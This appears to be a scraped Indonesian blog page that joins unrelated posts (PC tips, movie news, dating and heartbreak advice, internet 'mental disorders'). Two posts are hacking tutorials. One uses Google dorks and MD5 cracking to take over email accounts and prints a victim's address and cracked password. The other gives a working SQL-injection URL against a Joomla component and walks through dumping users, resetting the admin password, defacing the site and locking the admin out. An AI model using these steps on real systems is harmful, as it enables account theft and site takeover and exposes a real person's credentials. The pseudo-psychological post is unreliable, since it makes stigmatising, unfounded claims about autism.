Tips Cara Mengembalikan Obrolan Facebook Yang Dulu


untuk menggunakan Add on Mozilla >> Klik Di sini

untuk menggunakan Add on google Chrome >> Klik Di sini
dan atau tidak mau sama sekali menggunakan add on


Lalu >> Klik disini.

SELESAI gan
Good Luck ^_^

Hacking Email – Hotmail Yahoo Gmail [BINUSHACKER]

Assalamualaikum
Ane cuma mau share tutor cupu nih,…
Cuma share aja ,…..
Berikut POC + PICT nya jadi gak ada yang protes minta POC sama PICT
Btw langsung saja ke TKP :
Hari ini ane akan menunjukkan kepada Anda cara hack account email menggunakan beberapa Dorks google khusus, ingat google adalah teman kita.
Persyaratan:
Google Dorks:
ext:sql intext:@hotmail.com intext:e10adc3949ba59abbe56e057f20f883e
ext:sql intext:"INSERT INTO" intext:@hotmail.com intextpassword
Quote:ext:sql intext:@hotmail.com intextpassword
Quote:ext:sql intext:@hotmail.com
Online Hash Cracker:
http://md5crack.com/
Ok mari kita mulai:
Mari kita pergi ke http://www.google.com dan copy paste kan dork yang ane share,…..dan cari salah satu situs di sana buat korban
Hack Email Hotmail
Pilih salah satu halaman ditampilkan, seperti yang Anda lihat sekarang kita memiliki banyak account email + hash
Hack Gmail - Hacking Email
Saya memilih account acak
zhaokailun92@yahoo.com.cn
d2491b289b6be1fd0bb0c8d60 e053d3d
Kita buka MD5 Cracker Hash, Bisa Disini: http://md5crack.com , atau anda bisa cari di google tools untuk Crack MD5 password, banyak bertebaran.
Kemudian masukkan hashnya ke tools MD5 online Cracker, jadi seperti gambar berikut:
Hacking Yahoo EMail
Seperti yang Anda lihat kita dapat menghack account yang kita tuju
Email: zhaokailun92 @ yahoo. com.cn
Password: 19920707
Ets, bersenang-senang dan menikmati akun tak terbatas ,…btw jgn hack email ane yahh cuma numpang share aja kok ,…
Tutor nya jga baru ane pelajari jadi jika ada yang salah maafin yoo..
Credit : badwolves1986@HN

Hacking Administrator

Hacking Administrator Joomla – Get Full Access!
Tools required:
SQL-i Knowledge
reiluke SQLiHelper 2.7
Joomla! Query Knowledge
Finding Exploit And Target
Those two steps could go in different order, depend what you find first target or exploit…
Google dork: inurl:”option=com_idoblog”
Comes up with results for about 140,000 pages
[Image: 001cv.png]
At inj3ct0r.com search for: com_idoblog
Give us back Joomla Component idoblog 1.1b30 (com_idoblog) SQL Injection Vuln
[Image: 002rg.png]
==
Joomla Component idoblog 1.1b30 (com_idoblog) SQL Injection Vuln
==
index.php?option=com_idoblog&task=profile&Itemid=1337&userid=62+union+select+1,concat_ws(0x3a,username,password),3,4,5,6,7,8,9,10, ​11,12,13,14,15,16+from+jos_users–
Exploit can be separated in two parts:
Part I
index.php?option=com_idoblog&task=profile&Itemid=1337&userid=62
This part opening blog Admin page and if Admin page don’t exist, exploit won’t worked (not completely confirmed)
Part II
+union+select+1,concat_ws(0x3a,username,password),3,4,5,6,7,8,9,10,11,12,13,14,1​5,16+from+jos_users–
This part looking for username and password from jos_users table
Testing Vulnerability
Disable images for faster page loading:
[Firefox]
Tools >> Options >> Content (tab menu) >> and unclick ‘Load images automatically’
Go to:
Code:
http://www.site.com/index.php?option=com_idoblog&view=idoblog&Itemid=22
Site load normally…
Go to:
Code:
http://www.site.com/index.php?option=com_idoblog&task=profile&Itemid=1337&userid=62
Site content blog Profile Admin
Go to:
Code:
http://www.site.com/index.php?option=com_idoblog&task=profile&Itemid=1337&userid=62+union+select+1--
Site is vulnerable
Inject Target
Open reiluke SQLiHelper 2.7
In Target copy
Code:
http://www.site.com/index.php?option=com_idoblog&task=profile&Itemid=1337&userid=62
and click on Inject
Follow standard steps until you find Column Name, as a result we have
[Image: 003bd.png]
Notice that exploit from inj3ct0r wouldn’t work here because it looking for jos_users table and as you can see
our target use jos153_users table for storing data
Let Dump username, email, password from Column Name jos153_users. Click on Dump Now
[Image: 004k.png]
username: admin
email: info@site.com
password: 169fad83bb2ac775bbaef4938d504f4e:mlqMfY0Vc9KLxPk056eewFWM13vEThJI
Joomla! 1.5.x uses md5 to hash the passwords. When the passwords are created, they are hashed with a
32 character salt that is appended to the end of the password string. The password is stored as
{TOTAL HASH}:{ORIGINAL SALT}. So to hack that password take time and time…
The easiest way to hack is to reset Admin password!
Admin Password Reset
Go to:
Code:
http://www.site.com/index.php?option=com_user&view=reset
This is standard Joomla! query for password reset request
[Image: 005hy.png]
Forgot your Password? page will load.
In E-mail Address: enter admin email (in our case it is:info@site.com) and press Submit.
If you find right admin email, Confirm your account. page will load, asking for Token:
Finding Token
To find token go back to reiluke SQLiHelper 2.7 and dump username and activation from Column Name jos153_users
[Image: 006fj.png]
username: admin
activation: 5482dd177624761a290224270fa55f1d
5482dd177624761a290224270fa55f1d is 32 char verification token, enter it and pres Submit.
[Image: 007pa.png]
If you done everything ok, Rest your Password page will load. Enter your new password…
After that go to:
Code:
http://www.site.com/administrator/
Standard Joomla portal content management system
Enter username admin and your password, click on Login
Go to Extensions >> Template Manager >> Default Template Name >> Edit HTML
In Template HTML Editor insert your defaced code, click Apply, Save and you are done!!!
[Image: 008bo.png]
To make admin life more miserable, click on admin in main Joomla window and in User Details page change admin E-mail
[Image: 009kw.png]
Credit: MindFreak [HckGuide]

Tips Cara Menghilangkan Rasa Sakit Hati

Buat teman-teman yang sedang dilanda sakit hati, baik itu karena cinta maupun karena masalah yang sedang dihadapi, saya ada sedikit tips untuk di sharing ke teman-teman, semoga tips ini bermanfaat.


  1. Kata temen-temen yang pengalaman akan stress berat, tarik nafas yang panjang seusai mengalami masalah berat. Rileks dulu. Tenangkan ritme peredaran darah dan denyut jantung.
  2. Alirkan hawa positive secara perlahan dan buang energi negatif secepatnya [maksud loe ?]. Gini, misal study kasus : gue gagal eksekusi penalty di saat penting, rileks aja men, gue ga bodoh koq. david beckham dan roberto baggio aja gagal di depan jutaan orang. toh karir mereka ngga' banyak terganggu setelah itu. pikir positif. kegagalan itu adalah pelajaran.
  3. Contoh lain (yg populer) apa lagi? masalah cewek / cowok. whe hehe. sering banget tuhh bikin sakit hati. ni rada-rada panjang [kalo menurut teropong gue] pertama : Jika kamu kalah bersaing,karena lawan kmu itu lebih pinter, jenius, kaya, keren, dll. Sudahlah, terima dulu keadaan ini, jangan menghabiskan tenaga untuk bertempur terus-terusan apa lagi sampai bertahun-tahun. just leave her / him. positive thinking : betapa sialnya dia, menolak orang keren seperti Anda !! ingat, anda terlalu berharga untuk dipermainkan. Masih ngga' bisa lupakan ? sakit hati ? Hemmm. . langkah penghabisan : hapus no HP nya, hapus segalanya yang berhubungan dengan dia / moment buruk, baik foto, maupun benda-benda lain yang bisa membuat drop pikiran.
  4. Jangan mendengarkan lagu-lagu patah hati, menyerah atau pasrah, dengarkan lagu inspiration dan bahagia.
  5. Habiskan waktumu bersama sahabat-sahabat baik, genk, atau siapa pun buat ngobrol, curhat dan tukar pikiran.
  6. Jangan ada waktu buat melamun, atau pikiran kosong. berbahaya.(hantu ??) ngga', bukan itu!! tapi berpotensi mengenang ingatan burukmu. Jadi isilah seluruh waktumu dengan pekerjaan. baik maen game, menulis, membaca, ngoding, query, pokoke harus membuat otakmu berpikir. Semakin keras semakin baik. Semakin senang juga bagus. kombinasikan dengan gerak motorik dan panca indera yang lain. (jogging pagi-pagi sambil cuci mata misalnya :P)
  7. Baca buku-buku motivasi biar tetap semangat dan tegar dalam menjalani problematika kehidupan yang berat dengan ujian ini.
  8. Terakhir yang Paling Penting : ingat Tuhan, banyak berdoa. Mungkin sakit hati itu adalah cobaan bagimu, karena mungkin saat itu kamu lebih mencintai dunia dari pada Sang Pencipta.

Segini dulu dech, memang sulit menghilangkan sakit hati, bukan berarti sang penulis kebal dari sakit hati [penulis sendiri masih menyisakan sepertiga rasa sakit hati] jadi butuh masukan lagi dari sahabat dan teman-teman. OK, mohon koreksi dari teman-teman jika terdapat salah kata dalam penulisan. Karena yang salah datangnya dari penulis dan yang benar datangnya dari Sang Pencipta.

Mempercepat Kinerja Komputer


Mempercepat kinerja komputer sangat diperlukan bagi kita yang sering bekerja dengan komputer. Ada kalanya saat kita sedang asyik mencari data di komputer kita, kita menggunakan Windows Explorer. Namun di sela-sela keasyikan kita untuk menelusuri folder demi folder dengan menggunakan Windows Explorer, fasilitas scrolling yang ada pada Windows Explorer mengalami macet dan begitu berat serta lamban, sehingga sulit untuk menggulung layar ke arah bawah.

Tentu kita akan merasa sangat jengkel dan merasa terganggu karena pekerjaan kita menjadi terhambat oleh lambatnya kinerja scrolling yang berat dan lamban. Ada kalanya juga komputer kita sering hank dan ngadat, atau bahkan mati total.

Untuk menghindari hal-hal tersebut, sobat bisa mengikuti tips-tips berikut ini :

Mempercepat Kinerja Windows XP :
  1. Menonaktifkan atau mengurangi semua fitur grafik dan efek di WinXP.
  2. Caranya : klik kanan di My Computer – Properties – Advanced – ada 3 menu setting – pilih Setting Performance (paling atas) , matikan semua fitur yang anda rasa tidak perlu dengan menghilangkan tanda centangnya atau anda bisa memilih adjust for best performance untuk menonaktifkan semuanya.
  3. Hapus Prefetch.
  4. Caranya : klik-kanan menu start – explore – windows – Prefetch – hapus semua yang ada di folder Prefetch tersebut. ini boleh anda lakukan setiap waktu bila isi folder Prefetch sudah banyak.
  5. Percepat start-up menu.
  6. Caranya : klik satrt – run – ketik regedit – klik OK – masuk Registry Editor – klik-HKEY_CURRENT_USER – Control Panel – Desktop – pada jendela kanan double klik MenuShowDelay – ganti Value data yang defaultnya 400 menjadi 0 (nol) – klik Ok – tutup Registry Editor.
  7. Menonaktifkan start-up program yang tidak perlu.
  8. Caranya : klik start – run – ketik msconfig – klik Ok – masuk System Configuration Utility – klik startup (kanan atas) hilangkan centang pada list program yang anda anggap tidak perlu-restart PC anda.
  9. Sesering mungkin mendefrag dan melakukan clean up. Terutama setelah men-download file yang cukup besar.
  10. Defragment ini juga bisa membersihkan hardisk dari data-data yang tidak berguna. Sehingga jika anda melakukan defragment hardisk ini akan menambah free spac penyimpananan hardisk anda. Caranya : My Computer -> C: (sesuai dengan hardisk yang anda ingin bersihkan) -> Klik Kanan -> Properties -> (tab) Tools -> Defragment Now.
  11. Lakukan Disk Cleanup.
  12. Disk Cleanup ini akan membersihkan file-file bekas yang sudah tidak dibutuhkan lagi sehingga dapat menghemat space hardisk anda. Caranya : My Computer -> C: (sesuai dengan hardisk yang anda ingin bersihkan) -> Klik Kanan -> Properties -> Disk Cleanup.
  13. Melakukan Tweaking dengan Software.
  14. Banyak software yang tersedia yang mampu meningkatkan performa komputer anda. Diantaranya Tune Up Utilities, CCleaner, RegCleaner dan masih banyak lagi. Tools-tools tersebut juga bisa membersihkan registry anda dari kesalahan-kesalahan / Error. Anda dapat mencari sofware - software tersebut di google maupun indowebster.
  15. Optimalkan Virtual Memori.
  16. Caranya : My Computer -> Klik Kanan -> Properties -> (Tab) Advance -> (Performance -> Setting) -> Advanced -> (Virtual Memori -> Change) Nah disitu ada bagian custom size anda isi disitu sesuai dengan yang ada di Reccomended

Mempercepat Kinerja Windows 7 :
  1. Singkirkan Font yang tidak digunakan. Kecuali anda bekerja di bagian percetakan, ada banyak sekali font yang tidak digunakan namun tetap di load saat anda menggunakan Windows 7. Hal ini menyebabkan berkurangnya kapasitas memory kosong yang sebenarnya dapat digunakan oleh proses lain. Untu menyingkirkan font yang tidak digunakan, ikuti langlah-langkah di bawah ini.
    • Buat folder baru sebagai folder backup font.
    • Buka control panel dan lanjutkan dengan membuka folder fonts.
    • Pilih font yang tidak biasa anda gunakan dan pindahkan ke folder backup yang telah anda buat tadi. Jangan menghapus font yang tidak anda gunakan karena mungkin pada saat yang lain anda membutuhkannya. Jika ingin mengaktifkan font yang telah anda pindah, hanya perlu mengembalikannya ke folder semula.
  2. Percepat waktu booting. System windows 7 akan booting lebih cepat jika anda menggunakan tips berikut ini.
    • Klik start, lanjutkkan dengan mengetik msconfig pada Start Search dan tekan tombol enter.
    • Klik tab Boot dan pergi ke bagian Advanced Options.
    • Ketik jumlah nomor processor yang digunakan saat proses pada kolom Number of Processors.
    • Klik Apply dan restart system untuk melihat efeknya.
  3. Nonaktifkan System Sound. Jika anda tidak tertarim menggunakan system sound, anda dapat menonaktifkannya dengan melakukan langkah di bawah ini. Hal ini akan mempercepat proses saat loading system.
    • Klik start, lanjutkkan dengan mengetik mmsys.cpl pada Start Search dan tekan tombol enter.
    • Buka tab Sound dan pilih No Sound pada pilihan yang ada.
    • Klik Apply untuk mengaplikasikannya dan restart Windows 7 anda.
  4. Nonaktifkan Index Search di Windows 7.
    • Klik start, lanjutkkan dengan mengetik services.msc pada Start Search dan tekan tombol enter.
    • Cari Windows Search, klik kanan dan kemudian dan nonaktifkan service tersebut.
  5. Nonaktifkan Service yang tidak digunakan. Beberapa service windows masih berjalan pada system meskipun kita sendiri tidak memerlukannya. Hal ini akan memakan memory yang sebenarnya dapat digunakan untuk proses lain yang lebih penting. Untuk menonkatifkan service yang tidak digunakan, ikuti petunjuk berikut ini.
    • Buka Start menu, All Programs dan kemudian lanjutkan ke Administrative Tools Options. Pilihan ini mungkin tidak ada jika anda login sebagai Guest, bukan sebagai admin.
    • Klik tab Advanced dan lihat nama service yang ada pada bagian bawah.
    • Hilangkan tanda check-box pada service yang tidak digunakan dan biarkan service yang masih anda gunakan.
    • Restart windows 7 untuk melihat efeknya.
  6. Kurangi Start-up Windows 7. Banyak apliaksi yang di-load secara otomatis oleh windows padahal anda sendiri jarang menggunakannya. Untuk menonaktifkan Start-up program, ikuti langkah berikut ini.
    • Klik start, lanjutkkan dengan mengetik msconfig pada Start Search dan tekan tombol enter.
    • Buka tab Startup.
    • Nonaktifkan start-up aplikasi yang tidak digunakan dan restart windows 7 anda.
Dari tips di atas, sebenarnya masih banyak tips lain yang dapat anda gunakan untuk mempercepat system Windows dengan catatan anda harus mengerti bagaimana system bekerja. Ikuti tips-tips selanjutnya.

Semoga Bermanfaat.

Film 'Harry Potter 7' Siap Tayang

http://images.detik.com/content/2011/07/15/229/Harry_Potter_285.jpghttp://3.bp.blogspot.com/_TMMIX4-yX5U/TQNJJwmqOjI/AAAAAAAAACM/TzqDVrQV6zw/s1600/harry-potter-7.jpg


Pengusaha Bioskop Seluruh Indonesia (GPBSI) memastikan film-film Box Office terbaru seperti 'Harry Potter & the Deathly Hallows: Part 2'; 'Transformers: Dark of the Moon' dan Kung Fu Panda 2 akan tayang pada akhir Juli 2011 nanti.

Demikian disampaikan Ketua Umum GPBSI, Djonny Syafruddin dalam siaran pers terkait siap disiarkannya film-film yang sudah diputar 2 minggu lalu di negara lainnya, Sabtu (23/7/2011).

"Film-film ini sudah masuk ke pelaksana teknis, kita prediksikan paling lambat akhir bulan Juli 2011," janjinya

Ia menambahkan, saat ini pita film tersebut sedang masuk proses teknis lulus sensor, dan nantinya harus diperiksa lagi dan digandakan dengan kopi hingga 90 kopi film yang nantinya akan diputar secara serentak di Indonesia.

"Jadi yang nanti diputar adalah Harry Potter and The Deathly Hallows Part 2, Transformer: Dark of The Moonn dan lain-lain," lanjut Djonny.

Djonny mengakui sebenarnya film tersebut sudah telat diputar, Indonesia sudah tertinggal selama dua minggu. Karena itu, Djonny menekankan akan segera memutarkan film tersebut supaya film Indonesia untuk Box Office dapat disesuaikan dengan standar peredaran film di negara lain.

"Yang pasti harapan kita adalah secepatnya. Film-film akan diputar secara bertahap, karena kasihan juga dengan film lokalnya," ungkapnya.

Film Box Office tersebut dapat ditayangkan setelah permasalahan terkait masalah pajak dan bea masuk impor sudah dapat diselesaikan antara pihak Kementerian Keuangan, Kementerian Kebudaya dan Pariwisata, serta pengimpor film.

"Untuk film-film yang sudah tertinggal sejak musim panas lalu, nantinya akan dipilih selektif dan diselipkan mana yang terbaik untuk ditayangkan, yang penting diprioritaskan film nasional," tambahnya.

Seperti diketahui, Omega Film akhirnya mengantongi izin impor setelah sempat diblokir selama 2 pekan. Bea Cukai sebelumnya sempat memberikan izin Omega melalui pemberian Nomor Identitas Kepabeanan (NIK) pada 3 Mei 2011 lalu. Setelah itu mulai berdatangan permintaan izin dari importir film lain.

Setelah dilakukan pemeriksaan lapangan, ternyata empat dari lima importir yang mengajukan izin memiliki alamat yang sama dengan Omega Film. Hal inilah yang menyebabkan pihak Ditjen Bea Cukai menahan pengeluaran NIK bagi importir film baru ini guna melakukan penelitian lebih lanjut terkait hubungan para importir tersebut.

Namun blokir itu akhirnya dicabut, sehingga Omega bebas mengimpor film lagi. Bahkan pihak 21cineplex lewat akun Twitter mereka pada Jumat (15/7/2011) dini hari telah mengumumkan 'Harry Potter & the Deathly Hallows: Part 2' dan 'Transformers: Dark of the Moon' siap diputar di bioskop tanah air.

"Welcome Harry Potter & the Deathly Hallows: Part 2 and Transformers: Dark of the Moon, now coming soon on 21cineplex." tulis pihak 21cineplex.

Ternyata Shopping Itu Menyehatkan Lho !!



Bukan hanya menyehatkan secara fisik, belanja juga bisa mendekatkan hubungan antarteman dan pasangan. Jadi, sebenarnya ada banyak manfaat kesehatan fisik dan psikologis yang bisa Foodlovers dapatkan lewat aktivitas belanja.
1. Berjalan

Penelitian menunjukkan bahwa berjalan kaki 20 menit setiap hari memperkuat jantung dan meningkatkan harapan hidup. Ketika Anda berbelanja banyak barang bisa jadi Anda berjalan lebih dari 20 menit. Jadikan berbelanja sebagai aktivitas yang sehat dengan menggunakan sepatu yang nyaman. Dengan cara ini Anda bisa berbelanja sekaligus berolahraga.
2. Mendekatkan hubungan
Sebagian besar wanita berbelanja dengan teman atau pasangan. Hal ini meningkatkan intenitas komunikasi dan makin saling mengenal satu sama lain. Misalnya, Anda jadi tahu model pakaian apa yang tidak disukai atau pas untuk pasangan dan sebaliknya.
3. Melatih memilih barang yang pas


Saat Anda berhasil memilih jins yang sangat pas di tubuh, pasti ada kepuasan sendiri. Berbelanja membuat Anda tahu apa yang paling cocok untuk diri Anda. Apalagi jika Anda berbelanja di pertokoan yang barangnya bisa ditawar. Dengan harga miring, Anda bisa mendapatkan barang yang bagus. Cara ini melatih Anda lebih selektif dalam memilih sesuatu.
4. Mencoba hal baru


Pasti busana model baru akan dipajang di etalase. Hal bisa menggoda Anda untuk mencobanya. Gaya busana pun jadi lebih bervariasi. Bukan hanya hal baru dalam berbusana, tetapi juga aksesori, teknologi atau makanan. Mencoba sesuatu yang baru memang menimbulkan sensasi dan kepuasan sendiri yang membuat Anda merasa lebih senang.
5. Menghilangkan stres

Meskipun Anda tidak memiliki cukup uang untuk berbelanja banyak barang, sekedar melihat-lihat barang, bisa jadi hiburan. Itu adalah salah satu alasan mengapa wanita sering pergi berbelanja saat stres. Lagipula, secara ilmiah, belanja mengaktifkan pusat otak yang mengendalikan produksi hormon dopamin. Dengan hormon ini seseorang akan merasa lebih tenang dan bahagia.

Tips n trik memaksimalkan aktivitas bakar kalori kala shopping :

Tips n trik memaksimalkan aktivitas bakar kalori kala shopping :

1. Berjalanlah sesering mungkin. Bila di mall ada fasilitas tangga, maka abaikan eskalator dan lift.
Naik turun tangga bisa disamakan dengan latihan kardiovaskuler sehingga mampu membakar kalori

2. Ajak teman dan pakai pedometer (alat pengukur langkah). Parkirlah agak jauh sehingga anda punya banyak waktu yang lebih lama untuk berjalan. Window shopping boleh dilakukan, asal tak memperlambat langkah anda

3. Saat menunggu barang belanjaan atau mengantre di kasir, tetap lakukan gerakan-gerakan kecil
4. Bila telah menenteng belanjaan, lakukan latihan bicep curl (untuk menguatkan otot bisep) sebanyak 20 kali perulangan untuk tas yang lebih ringan dan 15 kali perulangan untuk tas belanjaan yang lebih berat


Jika berbelanja di supermarket :

1. Jika hanya membeli beberapa item, gunakan keranjang. Setalah dimasukkan ke dalam tas, tenteng barang tersebut dan jangan gunakan trolley

2. Saat menjangkau barang, yang berada di rak bawah, berjongkoklah. Ulangi 2-3 kali untuk menguatkan otot betis dan paha

3. Ketika menjangkau barang di rak yang tinggi, jinjitlah selama 10 detik. Ulangi sebanyak 5 kali. Teknik tersebut akan menguatkan kaki, punggung, dan lengan

Sumber : http://www.klikunic.com/2011/07/ternyata-shopping-itu-menyehatkan-lho.html#ixzz1TYVYKk8G

6 Gangguan Mental Akibat Internet

http://images.detik.com/content/2011/05/24/763/playboy-ts-dlm.jpg
http://cdn.rachmadrevanz.com/wp-content/uploads/2011/04/Gangguan-Mental.jpg


Internet telah membuat banyak orang menjadi “gila”.Ada orang yang lebih mencintai internet melebihi rasa cinta kepada pasangannya.Ada juga orang yang rela tidak tidur demi chating dan browsing.Ada anak yang lebih memilih internet dari nasi.Dari orang dewasa hingga anak-anak memenuhi warung-warung internet, setiap harinya, karena “kegilaan” terhadap internet.

Ini dia ancaman ke 6 Gangguan mental saat kita sedang online di internet..

1. Gangguan kepribadian berupa emosi yang sebentar-sebentar meledak di saat online – mengamuk karena mudah tersinggung (Online Intermittent Explosive Disorder/OIED)
orang yang mengidap gangguan ini tampak normal pada awalnya. Beberapa hari atau jam sebelumnya mereka bisa saja melakukan pembicaraan-pembicaraan lucu atau komentar-komentar hangat. Akan tetapi beberapa saat kemudian berubah marah-marah dan mengumpat disebabkan sesuatu yang menyinggung perasaannya.

Kenapakah hal itu bisa terjadi di Internet?
* Kebanyakan dari kita hanya bisa menahan hasrat untuk melakukannya di dunia nyata, yang apabila dilakukan mungkin bisa membuahkan sebuah tinju ke wajah kita.

* Di Internet kebanyakan pengguna menyembunyikan identitas aslinya, sehingga mereka dengan bebas mengeluarkan isi hati dan kemarahannya tanpa khawatir reputasinya menjadi jelek.

* Karena pengungkapan perasaan dalam bentuk tulisan sering terlihat datar dan tidak menggambarkan emosi dengan jelas, seperti halnya nada suara, mimik wajah dan bahasa tubuh lainnya di saat tatap muka langsung, sehingga orang cenderung menggunakan kata-kata yang tajam, kasar dan keras untuk mewakili sebuah perasaan tertentu.

2. Toleransi rendah terhadap kekalahan dalam forum (Low Forum Frustration Tolerance/LFFT)
Digambarkan sebagai seseorang yang mencari-cari kepuasan segera atau penghindaran dari rasa sakit dengan segera. Pada awalnya mirip dengan perilaku anak tujuh tahunan yang menginginkan sebuah mainan, dan akan berteriak dengan menghentak-hentakan tangan dan kakinya agar segera mendapatkan apa diinginkannya.

Bagi orang yang suka menulis dan melakukan posting, sering kali merasa bahwa postingnya sangat sempurna. penulisnya hampir setiap waktu mengecek masuknya komentar yang baru diberikan pembacanya. Jika ia mendapat komentar-komentar miring penuh kritik, maka dengan cepat ia akan meluncurkan jawaban yang akan mematahkan tanggapan itu.

Jika tidak ada yang memberikan komentar, dia akan mengirimkan komentarnya sendiri – mungkin dengan nama lain – untuk meramaikan tulisannya.

Kenapakah hal itu bisa terjadi di Internet?
Kegiatan itu membuat kita menjadi tidak sabaran, karena ingin segera melihat respon dengan dari pihak lain. Ketidaksabaran ini meminimalkan toleransi terhadap serangan yang menimbulkan ketersinggungan.

3. Munchausen di Internet - tukang cerita untuk membangkitkan rasa kasihan (Munchausen Syndrom)
suatu kondisi di mana seseorang dengan sengaja membuat kebohongan, menirukan, menambah buruk suatu keadaan, atau mempengaruhi diri sendiri agar sakit dengan tujuan diperlakukan seperti orang sakit.

Kenapa hal itu bisa terjadi di internet?
Sangat mudah melakukan kebohongan dalam kehidupan nyata, dan sepuluh kali lebih mudah melakukannya di internet, karena tidak ada seorang pun bisa memeriksa kebenaran fakta-faktanya

4. Gangguan kepribadian yang tergoda untuk memaksa orang lain pada saat online (Online Obsessive-Compulsive Personality Disorder/OOCPD)
Gangguan kepribadian jenis ini bisa dijelaskan dengan contoh kegilaan akan tata bahasa. Ketika orang menemukan suatu kesalahan tata bahasa atau penulisan kata yang keliru dari orang lain dalam sebuah posting atau komentar, maka dia langsung menyerang dan dengan keras memprotesnya.

Kenapa hal demikian bisa terjadi di internet?
Dalam kenyataannya penderita OCPD merasakan ketakutan yang tidak logis terhadap dunia yang lebih berantakan, lebih kotor dan lebih kacau dibanding seharusnya yang dia pikirkan; sehingga secara cepat keadaan menjadi lebih buruk, dan akan mengalami kehancuran sampai ada seseorang yang memperbaikinya.

Di Internet, setelah membaca setiap komentar-komentar, orang normal akan menderita nasib yang sama. Tata bahasa yang keliru, pilihan kata yang tidak tepat, atau bahasa gaul yang membingungkan, mendesak anda untuk mengoreksinya. Tidak sulit merasakan keinginan untuk melatih diri menggunakan bahasa yang benar


5. Low Cyber Self-Esteem (LCSE) atau penghargaan terhadap diri sendiri yang rendah (Seperti seseorang yang dibenci setiap orang, tapi tidak ada yang meninggalkannya)
Di dalam kehidupan nyata ini disebut merendahkan diri sendiri atau perilaku pencarian perhatian.

Jika sampai kepada tingkat ekstrem, hal itu dapat berubah menjadi Online Erotic Humiliation atau pelecehan seksual secara online, di mana pelecehan menjadi sebuah tindakan nyata. Sehingga ketika anda mengatakan kepada seseorang agar melakukan sebuah tindakan seksual, mungkin dia akan menganggap hal itu penting dan dia dengan sungguh-sungguh akan melakukannya.

Kenapa hal itu bisa terjadi di Internet?
Pencari perhatian mendapatkan apa yang diinginkannya, dan penghina diri sendiri mendapatkan cukup ketegangan untuk mengaktualisasikan dirinya yang intropet melalui sinyal-sinyal yang dikirimnya via keyboard.

6. Internet Asperger’s Syndrome
hilangnya semua aturan sosial dan empati pada diri seseorang, disebabkan tanpa alasan selain hanya secara kebetulan berhadapan dengan sebuah benda mati; berkomunikasi via papan tombol dan monitor pada suatu waktu.

sindrom ini adalah bentuk halus dari autisme yang tampak berupa ketidakmampuan biologi untuk menunjukkan empati kepada manusia lain, mungkin disebabkan ketidakmampuan untuk mengenali isyarat nonverbal. Mereka secara terus-menerus bertingkah aneh dan mengganggu disebabkan mereka tidak mengetahui bahwa anda terganggu. Ada bagian dari otak mereka yang rusak.

(Beberapa kasus bunuh diri yang direkam dengan webcam – yang sebagian mungkin main-main – dan dipublikasikan di Internet. Untuk sekarang ini mungkin kita tidak yakin bahwa hal itu benar-benar terjadi, tetapi sebenarnya hanya masalah waktu.)

Kenapa hal itu bisa terjadi di Internet?
orang yang melakukan semua komunikasi online mereka menampilkan perilaku Asperger karena mereka ingin memberikan kesan ada kerugian yang sama pada diri sendiri. Di dalam hal ini, ketika kemampuan melihat respon dan mimik wajah atau ekspresi nonverbal sudah hilang, begitu juga dengan empati. Maka hal yang anda beritahukan hanya kepada orang yang tidak ada, karena itu hanyalah sekelompok kata-kata pada layar. Sekelompok kata-kata kecil yang tidak berarti.

Nah,tidak ada larangan untuk berinternet,akan tetapi beriternetlah dengan sehat,jagalah diri kita dan keluarga agar selamat dari sisi negatif internet.

jangan biarkan diri kita dikendalikan oleh internet,tetapi kitalah yang harus mengendalikannya,dengan mengetahui batasan-batasan dan bertindak sesuai kewajaran dan tidak melebihi batas dalam ber internet.Terima kasih .semoga bermanfaat.

5 Ciri Cowok yang Belum Pernah Pacaran

http://2.bp.blogspot.com/_mIbWH78C62g/ScLvx5jCQ7I/AAAAAAAAACI/pVf_IMFUrrA/s400/Pilem_072.JPEG

Ciri-ciri: Cowok yang belom pernah pacaran
Cara: mengenali Cowok yang tidak pernah pacaranApakah intinya dari pacaran itu? Kenapa orang berpacaran? Banyak sekali arti pacaran itu dari berbagai sisi. Ada yang bilang, pacaran itu adalah masa untuk mengenal pasangan kamu apakah dia cocok untuk dijadikan pasangan hidup. Ada juga yang bilang “Pacaran itu pemborosan pulsa telpon.” emang ada benernya juga sih!
Memang biasanya butuh beberapa tahun untuk mengenal seseorang secara dalam dan baru bisa membuat keputusan apakah ini orang bakalan jadi suami kamu ato tidak. Nah, memang belom tentu sekali pacaran, langsung cocok dan berhasil sampe jenjang pernikahan. Makanya itu, orang ada yang tidak pernah pacaran, dan ada juga yang berkali-kali pacaran tapi juga tidak nikah-nikah. Nah, berikut ini adalah ciri-ciri Cowok yang tidak pernah pacaran:

1. Jarang sekali curhat tentang masalah cinta

Ya karna dia tidak pernah pacaran, ya maklum lah. Memang ga ada juga cerita pribadi yang dia bisa curhat-in. Laen lagi kalo orangnya memang bener2 tertutup dan ga mau curhat soal sesuatu yang pribadi.


2. Tapi, dia mungkin jadi sering tanya soal masalah cinta

Karna mungkin penasaran, dia malah jadi sering tanya-tanya ke teman baeknya soal masalah cinta apalagi soal “cara mengejar Cewek”.

http://a831.ac-images.myspacecdn.com/images01/74/l_186f562e2ede2d188df70e721cda5f46.jpg

3. Gugup ato jadi canggung di depan seseorang yang dia suka

Biasanya, karna gugup, dia malah jadi bertindak tidak seperti biasanya. Contohnya, misalnya kamu kenal nih Cowok selalu pinter becanda di depan semua Cowok dan Cewek. Tapi keliatannya dia malah jadi tiba2 diem di depan Cewek yang dia suka. Karna mungkin gugup, ato takut si Cewek bakalan menilai dia terlalu cerewet kek, ga lucu lah, ato apa lah … Normal lah buat seseorang jadi gugup kalo berhadapan dengan seseorang yang lagi disuka.


4. Kurang percaya diri

Biasanya kalo Cowok yang tidak pernah pacaran pasti juga tidak mempunyai percaya diri yang tinggi. Mungkin karna dulu pernah dan sering ditolak oleh Cewek. Mungkin juga karna memang dari awalnya, dia tidak pernah mempunyai kepercayaan diri untuk mendekati si Cewek yang dia suka.


5. Kurang gaul/sosialisasi

Coba kamu perhatiin teman2nya dia. Apa dia orangnya suka pergi2 keluar dan bersosialisasi dengan orang2 baru? Ato, dia itu orangnya suka maen game melulu di rumahnya ato malah sibuk ngebantuin kerjaan orang tuanya selama 12 jam di kantor? Otomatis, orang yang tidak ada waktu untuk sosialisasi, pasti juga lebih sedikit kemungkinan dia untuk mengenal orang laen.


Apakah ada hal-hal laen yang kalian pernah lihat dari Cowok yang ga pernah pacaran?



Sumber : http://www.klikunic.com/2011/07/5-ciri-cowok-yang-belum-pernah-pacaran.html

Tips 8 Cara Agar Tubuh Lebih Tinggi



Cara ini membuat tinggi tubuh bertambah 5-10 sentimeter secara alami hingga usia 30 tahun , Banyak referensi mengatakan pertumbuhan tubuh wanita terhenti di usia 18-21 tahun.

